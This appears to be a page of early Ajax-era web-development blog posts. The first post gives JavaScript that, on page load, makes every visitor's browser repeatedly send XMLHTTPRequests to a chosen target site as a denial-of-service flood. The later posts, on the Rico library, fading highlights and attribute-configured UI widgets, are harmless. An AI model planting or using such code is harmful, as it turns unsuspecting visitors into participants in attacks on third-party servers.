XMLHTTPRequest for Denial of Service

Maybe the XMLHTTPRequest handler isn’t such a good idea…

Right, so I was thinking about the XMLHTTPRequest handler. Well, okay, actually, I was thinking of Sandra Bullock, and this idea popped into my head…

You can use XMLHTTPRequests to make requests of a web server. Fair enough. And you can make requests of another site – check. And you can make many of them on one page – yup. And finally, you don’t have to do anything with the response – you see where I’m going with this yet?

Assume you have a function for creating XMLHTTPRequest objects. Consider the following:
var urlTarget = 'www.example.com'; // The site we want to DOS
var aStack = array();

function fnHTTP (oHTTP) {
return function () {
if (oHTTP.readyState == 3) {
oHTTP.open("GET", urlTarget, true);
oHTTP.send(null);
}
}
}

function setupDOS () {
for (i=0; i<100; i++ ) {

oHTTP = GetXMLHTTPRequest();
oHTTP.open("GET", urlTarget, true);
oHTTP.onreadystatechange = fnHTTP(oHTTP);
oHTTP.send(null);

aStack.push( oHTTP );
}
}

window.onload = setupDOS;
So, a user goes to a page. In the background, after they’ve loaded the page, JavaScript is creating a whole load of XMLHTTPRequest objects, and then using these to make requests of a target site. And as each object gets serviced, it makes another request. Continue reading

Played with Rico…

I had a play with Rico then. Pretty good, generally. Some neat effects, and I like the way they do rounded corners – clever. Doesn’t work too well with boxes that have outlines, but hey! Can’t have everything.

Also, I found a bug in the way their Drag and Drop functionality works. If you click a node in the DOM beneath the node that is draggable, you get a Javascript error. I emailed them with a fix for that.

My only complaint about this Library – I’d prefer to have it as a selection of different Libraries. It seems a shame to have to lump them all together for some small bits of user interface. For example, I’d be willing to have Drag and Drop that doesn’t neatly ‘slide’ back to it’s original position if not dropped on a Drop Zone. Having that in the UI means including LOTS of extra code. I pulled the Drag and Drop code out into a seperate file – I’ll publish it and the fix at some point soon.

An interesting technique

Here’s an interesting technique of drawing a user’s eye to an area on a page, by using a colour that fades after a couple of seconds. I know that it’s supposed to be for areas updated by the user (and I can think of at least one project for doing this), but it might work else where. I must give this a go, see what it’s actually like. It’s going to either be really good, or really bad…

(Update – having migrated my blog to WordPress, I find that it uses this technique. And it’s quite nice. It works well)

Working on Web UI Components

So, this whole ‘Ajax’ thing set me thinking – why not try to make all ‘normal’ user interface components – date, numeric, combo boxes, autosuggestion boxes, image rollovers, menus, tooltips, etc. – why not make them all into libraries that you can include in a page, and then configure through the attributes of a node. E.g.
<input name='someDate' type='text' value='' subtype='date'
format='yyyy-mm-ddd'>

Then the .js file you include reads inputs, finds dates, and add the functionality you need.

I’ve already done this for combo boxes – I’ll put it on my site soon – and so I started looking into menus, and found some neat things:

I didn’t know you could do so much with CSS. Clearly, it has come along since I last really got stuck into it!